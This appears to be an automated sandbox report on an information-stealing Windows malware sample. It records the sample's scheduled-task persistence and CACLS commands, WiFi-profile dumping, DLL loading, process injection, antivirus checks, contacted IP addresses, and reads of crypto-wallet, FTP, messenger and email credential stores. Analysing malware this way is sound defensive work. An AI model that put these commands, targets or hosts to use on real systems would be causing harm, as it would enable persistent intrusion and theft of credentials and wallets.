cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
file	C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 27, 2023, 5 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe	1	1
ShellExecuteExW Oct. 27, 2023, 5 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 27, 2023, 5 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW Oct. 27, 2023, 5 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\cred64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Oct. 27, 2023, 5 p.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\465dbc52837d81\clip64.dll, Main filepath: rundll32.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (41 events)

Time & API	Arguments	Status	Return
Process32FirstW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: [System Process] process_identifier: 0	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: System process_identifier: 4	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: smss.exe process_identifier: 232	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: csrss.exe process_identifier: 308	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: wininit.exe process_identifier: 344	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: csrss.exe process_identifier: 356	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: services.exe process_identifier: 436	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: lsass.exe process_identifier: 452	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: lsm.exe process_identifier: 460	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 560	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 636	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 716	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 780	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 984	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 340	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: pw.exe process_identifier: 1888	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: pw.exe process_identifier: 1940	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: taskhost.exe process_identifier: 1000	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: SearchProtocolHost.exe process_identifier: 1820	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: cmd.exe process_identifier: 1712	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: conhost.exe process_identifier: 1020	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: SearchFilterHost.exe process_identifier: 1508	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: pw.exe process_identifier: 444	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: Utsysc.exe process_identifier: 2432	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: svchost.exe process_identifier: 1684	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: mscorsvw.exe process_identifier: 2156	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: mscorsvw.exe process_identifier: 2096	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: sppsvc.exe process_identifier: 2084	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: rundll32.exe process_identifier: 2372	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: rundll32.exe process_identifier: 2300	1	1
Process32NextW Oct. 27, 2023, 4:53 p.m.	snapshot_handle: 0x0000000000000134 process_name: rundll32.exe process_identifier: 2464	1	1

An executable file was downloaded by the process utsysc.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¶Õ×tOÕ×tOÕ×tO¿pNÇ×tO¿wNÞ×tO¿qNe×tOºqN×tOºpNÚ×tOºwNÜ×tO¿uNØ×tOÕ×uO×tON¹}NÑ×tON¹tNÔ×tON¹OÔ×tON¹vNÔ×tORichÕ×tOPEd /eð" rêÀ`%Xh%øÐØ¢ MpNà.textÈpr `.rdataº©ªv@@.data@> @À.pdataØ¢Ð¤^@@_RDATA@@.rsrcø@@.reloc @BHì(A¸ H''H [èH JHÄ(éÿÌÌÌHì(A¸ H'H °_ècH LJHÄ(éÏÌÌÌHì(A¸H'H ``è3H JHÄ(éÌÌÌHì(A¸ Hï&H p[èH ÌJHÄ(éoÌÌÌHì(A¸Hç&H à^èÓ~H KHÄ(é?ÌÌÌHì(A¸HÏ&H Yè£~H LKHÄ(éÌÌÌHì(E3ÀH¢H c_èv~H KHÄ(éâÌÌÌÌÌÌHì(E3ÀHrH _èF~H ÏKHÄ(é²ÌÌÌÌÌÌHì(E3ÀHBH £Zè~H LHÄ(éÌÌÌÌÌÌHì(E3ÀHH Xèæ}H OLHÄ(éRÌÌÌÌÌÌHì(A¸Hÿ%H àXè³}H LHÄ(éÌÌÌHì(A¸Hß%H °`è}H ÌLHÄ(éïÌÌÌHì(A¸H¿%H ^èS}H MHÄ(é¿ÌÌÌHì(A¸H%H pWè#}H LMHÄ(éÌÌÌHì(A¸H%H Yèó\|H MHÄ(é_ÌÌÌHì(A¸Ho%H [èÃ\|H ÌMHÄ(é/ÌÌÌHì(A¸HO%H [è\|H NHÄ(éÿÌÌÌHì(A¸H+%H pYèc\|H LNHÄ(éÏÌÌÌHì(A¸H%H @Zè3\|H NHÄ(éÌÌÌHì(A¸Hï$H ð[è\|H ÌNHÄ(éoÌÌÌHì(A¸HÏ$H \èÓ{H OHÄ(é?ÌÌÌHì(A¸LH¯$H ÐXè£{H LOHÄ(éÌÌÌHì(A¸HÏ$H Vès{H OHÄ(éßÌÌÌHì(A¸dH¿$H 0^èC{H ÌOHÄ(é¯ÌÌÌHì(A¸H÷$H \è{H PHÄ(éÌÌÌHì(A¸Hß$H PZèãzH LPHÄ(éOÌÌÌHì(A¸HÏ$H Uè³zH PHÄ(éÌÌÌHì(A¸H¯$H ðZèzH ÌPHÄ(éïÿÌÌÌHì(A¸(H$H `YèSzH QHÄ(é¿ÿÌÌÌHì(A¸H$H \è#zH LQHÄ(éÿÌÌÌHì(A¸Ho$H ^èóyH QHÄ(é_ÿÌÌÌHì(A¸HO$H PZèÃyH ÌQHÄ(é/ÿÌÌÌHì(A¸H/$H À[èyH RHÄ(éÿþÌÌÌHì(A¸H$H WècyH LRHÄ(éÏþÌÌÌHì(A¸,Hÿ#H ÀWè3yH RHÄ(éþÌÌÌHì(A¸Hÿ#H ÐVèyH ÌRHÄ(éoþÌÌÌHì(A¸Hï#H ZèÓxH SHÄ(é?þÌÌÌHì(A¸$HÏ#H ðZè£xH LSHÄ(éþÌÌÌHì(A¸HÇ#H WèsxH SHÄ(éßýÌÌÌHì(A¸H¯#H pRèCxH ÌSHÄ(é¯ýÌÌÌHì(A¸H#H àWèxH THÄ(éýÌÌÌHì(A¸H#H ÐTèãwH LTHÄ(éOýÌÌÌHì(A¸ Ho#H ÀXè³wH THÄ(éýÌÌÌHì(A¸ Hg#H °UèwH ÌTHÄ(éïüÌÌÌHì(A¸Hÿ"H àRèSwH UHÄ(é¿üÌÌÌHì(A¸H/#H Uè#wH LUHÄ(éüÌÌÌHì(A¸H#H @RèóvH UHÄ(é_üÌÌÌHì(A¸H÷"H PYèÃvH ÌUHÄ(é/üÌÌÌHì(A¸LHH @UèvH VHÄ(éÿûÌÌÌHì(A¸H§"H 0UècvH LVHÄ(éÏûÌÌÌHì(A¸dH¯H àUè3vH VHÄ(éûÌÌÌHì(A¸HW"H YèvH ÌVHÄ(éoûÌÌÌHì(A¸H?"H àWèÓuH WHÄ(é?ûÌÌÌHì(A¸H'"H ðTè£uH LWHÄ(éûÌÌÌHì(A¸H"H RèsuH WHÄ(éßúÌÌÌHì(A¸Hß!H ðXèCuH ÌWHÄ(é¯úÌÌÌHì(A¸H·!H TèuH XHÄ(éúÌÌÌHì(A¸H!H pRèãtH LXHÄ(éOúÌÌÌHì(A¸Ho!H Pè³tH XHÄ(éúÌÌÌHì(A¸HO!H NètH ÌXHÄ(éïùÌÌÌHì(A¸H?!H TèStH YHÄ(é¿ùÌÌÌHì(A¸0H!H pWè#tH LYHÄ(éùÌÌÌHì(A¸H'!H `WèósH YHÄ(é_ùÌÌÌHì(A¸H!H ðWèÃsH ÌYHÄ(é/ùÌÌÌ request_handle: 0x00cc0014	1	1	0
InternetReadFile Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $'ö³cjàcjàcjà8ÿiáijà8ÿoáëjà8ÿnáqjà¶únáljà¶úiárjà¶úoáBjà8ÿkádjàckàjàøùcá`jàøùjábjàøùàbjàøùhábjàRichcjàPEL /eà!Ðf à@@zÜzP°øÀÜÀnp0o@ H.text `.rdata@b d@@.datav@À.rsrcø°@@.relocÜÀ@Bj hèl¹pèOHh°è\SYÃÌÌÌj hm¹è/Hhè<SYÃÌÌÌjh0m¹ èHhpèSYÃÌÌÌjhHm¹¸èïGhÐèüRYÃÌÌÌjhem¹ÐèÏGh0èÜRYÃÌÌÌjhem¹èè¯Ghè¼RYÃÌÌÌjhem¹èGhðèRYÃÌÌÌjhem¹èoGhPè\|RYÃÌÌÌh°èmRYÃÌÌÌÌhè]RYÃÌÌÌÌhpèMRYÃÌÌÌÌj?hðm¹xèGhÐè,RYÃÌÌÌh°èRYÃÌÌÌÌhPè RYÃÌÌÌÌhðèýQYÃÌÌÌÌhèíQYÃÌÌÌÌh0èÝQYÃÌÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPè[ÄÆ^]ÂÌÌÌI¸¼lÉEÁÃÌÌUìVñFÇÔ!PèC[ÄöEtjVèûMÄÆ^]ÂAÇÔ!Pè[YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÐlÇ,"ÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿh(zEôPèëZÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèBZÄÇ,"Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇÔ!fÖEÀPèZÄÇà!Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìì}SVÙW]àÛ}0Ñ}HÇj/hhmMÈÇEôÇEøÆEäÇEØÇEÜÆEÈèþDjjjjhmÿ,!}MjCMjjjjjPQPE´ÿ0!}4M jCM jjjjQhmPE¸ÿ4!}LU8ÿuHCU8MÈ}ÜðRÿuØCMÈQVuÀÿ8!EüPhÿûÿÿPVÿ<!Ài}ü\ûÿÿÇEÇEPÆEfD@Éuù+ÂMPûÿÿPèDMüE9MÇE¬BM}QCEMPÇE°ÆEèæC}°U}MôC×Eø]¬+ÁMÄSR;Øw,}øuäCuäEôPè[jMÄ3uÀÄÆëÆE¼Mäÿu¼SèIG}E°ør+HÇùrüÁ#+ÇÀüøQWèKÄUúr,MBÁúrIüÂ#+ÁÀüødRQèÓJÄEüÆûÿÿEüPhÿûÿÿPVÿ<!Àþÿÿ]àV5@!ÿÖÿu¸ÿÖÿu´ÿÖEäUÜ¸ÆEäó~EôfÖCÇEôEøúr/MÈBÁúrIüÂ#+ÁÀüøÌRQè;JEøÄÇEØÇEÜÆEÈør.MäPÁúrIüÂ#+ÁÀüøRQèóIÄUÇEôÇEøÆEäúr,MBÁúrIüÂ#+ÁÀüø>RQèIÄU4ÇEÇEÆEúr,M BÁúrIüÂ#+ÁÀüøøRQègIÄULÇE0ÇE4ÆE úÇM8BÁú«IüÂ#+ÁÀüøªéjhemÇCÇCÆèMAUúr(MBÁúrIüÂ#+ÁÀüøwbRQèÑHÄU4ÇEÇEÆEúLÿÿÿM BÁú0ÿÿÿIüÂ#+ÁÀüøwéÿÿÿRQèHÄ_^Ã[å]Ãè nÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì<¹`SVW=@3öVhem3Ûè@ÿDCOãÿyKËÿÿÿCð¥¶ÑòæÿyNÎÿÿÿF¶ð¥ð¥ð¥Mà¶ð¥Âuø¶ÀjÇEðÇEô¶ð¥EÿEÿPÆEàè@Eàº`PMÈèvAðÄþ`t\| tùr.¡`AùrPüÁ#+ÂÀüøÔÂQPèdGÄÇpÇtÆ``ó~FfÖpÇFÇFÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøw_RQèñFÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøwRQè¯FÄÿtuøéoþÿÿ_^[å]ÃèÃlÌÌÌUìì<SVWùÇGÇGÆèþÿÿ¡t¾``ø»0Cò=DC0+Þ]øø¹`¡pCÊÁ;ð*3Mà2EÿEÿjPÇEðÇEôÆEàèN>Eà×PMÈèÀ?ØÄ;ûteOùr+AùrPüÁ#+ÂÀüøÍÂQPè¸EÄÇGÇGÆó~CfÖGÇCÇCÆUÜúr(MÈBÁúrIüÂ#+ÁÀüøwiRQèVEÄUôÇEØÇEÜÆEÈúr(MàBÁúrIüÂ#+ÁÀüøw'RQèEÄ¡tF`]øé¼þÿÿÇ_^[å]ÃèkÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìQ}4E SCE VWÿu0Mü¹HPè =}EÿuCE¹0Pèô<5X3Û=\fDÿð¥Ã¹HC H÷þ ð¤Cû\|Ô3ÿ3öð¥¶ð¤ø¶ÊùçÿyOÏÿÿÿGð¥ð¥Fð¥þ\|ÁuüÎèýÿÿUúr request_handle: 0x00cc0014	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 27, 2023, 5 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 27, 2023, 5 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (26 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Communications over HTTP	rule	Network_HTTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Communications over HTTP	rule	Network_HTTP
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Oct. 27, 2023, 5 p.m.	status_code: 0xffffffff process_identifier: 2136 process_handle: 0x000002e0		0	0
NtTerminateProcess Oct. 27, 2023, 5 p.m.	status_code: 0xffffffff process_identifier: 2136 process_handle: 0x000002e0	1	0	0

Uses Windows utilities for basic Windows functionality (9 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	CACLS "Utsysc.exe" /P "test22:R" /E
cmdline	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
cmdline	"C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
cmdline	cmd /k echo Y\|CACLS "Utsysc.exe" /P "test22:N"&&CACLS "Utsysc.exe" /P "test22:R" /E&&echo Y\|CACLS "..\ea7c8244c8" /P "test22:N"&&CACLS "..\ea7c8244c8" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	netsh wlan show profiles
cmdline	CACLS "Utsysc.exe" /P "test22:N"

Communicates with host for which no DNS query was performed (2 events)

host	185.196.8.176
host	89.208.104.64

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2136 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d8		3221225496
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2176 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002dc	1	0
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2432 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d4	1	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Oct. 27, 2023, 5 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml

Harvests information related to installed instant messenger clients (14 events)

file	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file	C:\Windows\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\ea7c8244c8\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1532 manipulating memory of non-child process 2136
NtAllocateVirtualMemory Oct. 27, 2023, 5 p.m.	process_identifier: 2136 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002d8		3221225496	0

Potential code injection by writing to the memory of another process (6 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: 0 H`À}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0044c000 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2176 process_handle: 0x000002dc	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: 0 H`À}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0044c000 process_identifier: 2432 process_handle: 0x000002d4	1	1
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2432 process_handle: 0x000002d4	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2176 process_handle: 0x000002dc	1	1	0
WriteProcessMemory Oct. 27, 2023, 5 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁBo,Ao,Ao,AÞ/@o,AÞ)@"o,AÞ(@o,AP(@o,AP/@o,AP)@Ëo,AÞ-@o,Ao-A.o,A%@o,AÓAo,A.@o,ARicho,APEL /eàz^P@@` ÀàÐh/ gp´hh@.text?yz `.rdatanÿ~@@.data+~@À.rsrcàÀ@@.reloch/Ð0@B base_address: 0x00400000 process_identifier: 2432 process_handle: 0x000002d4	1	1	0

Harvests credentials from local email clients (2 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1532 called NtSetContextThread to modify thread in remote process 2176
Process injection	Process 2336 called NtSetContextThread to modify thread in remote process 2432
NtSetContextThread Oct. 27, 2023, 5 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4297040 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002e0 process_identifier: 2176	1	0	0
